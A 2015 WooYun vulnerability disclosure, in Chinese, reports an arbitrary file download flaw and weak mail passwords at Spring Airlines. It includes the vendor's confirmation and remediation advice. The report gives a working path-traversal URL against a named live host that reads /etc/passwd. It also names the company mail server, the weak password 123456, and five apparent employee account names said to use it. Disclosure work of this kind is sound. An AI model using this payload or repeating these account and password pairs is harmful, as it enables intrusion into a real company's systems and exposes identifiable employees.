当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150538

漏洞标题:航空安全之春秋航空任意文件下载/爆破(导致泄露内部资料)

相关厂商:春秋航空

漏洞作者: 残冰

提交时间:2015-10-30 10:33

修复时间:2015-12-14 15:54

公开时间:2015-12-14 15:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

RT,一个漏洞不好提所以得多交个,这样RANK是否能给高点??

详细说明:

漏洞点:http://fcs.9cair.com

111.jpg


http://fcs.9cair.com/ImageShowServlet?para=fcs123&filetype=1&filePath=../../../../../../../../../etc/passwd%00


222.jpg


333.jpg


444.jpg


爆破,虽然让人提过,修复了OA的爆破漏洞;但是mail的没修复,有些账号密码还是未修改建议强制修改吧!
漏洞点:mail.ch.cn 弱密码:123456

xuping
xuyi
zhaotie
wuhao
jiangkua


11.jpg


22.jpg

漏洞证明:

已证明

修复方案:

过滤..;强制修改密码,QQ的mail邮箱好像可以设置登陆微信提醒!

版权声明:转载请注明来源 残冰@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-30 15:52

厂商回复:

已收到,谢谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-30 12:21 | 土夫子 ( 普通白帽子 | Rank:361 漏洞数:67 | 你怎样看世界,世界就怎样看你)

    爆破帝,求6666的字典

  2. 2015-10-30 12:29 | hkAssassin ( 普通白帽子 | Rank:377 漏洞数:70 | 我是一只毛毛虫。)

    @土夫子 借我20wb给你字典

  3. 2015-10-30 12:39 | 残冰 ( 普通白帽子 | Rank:206 漏洞数:30 | 专业爆破5000000000000000000000年)

    借我20wb给你字典!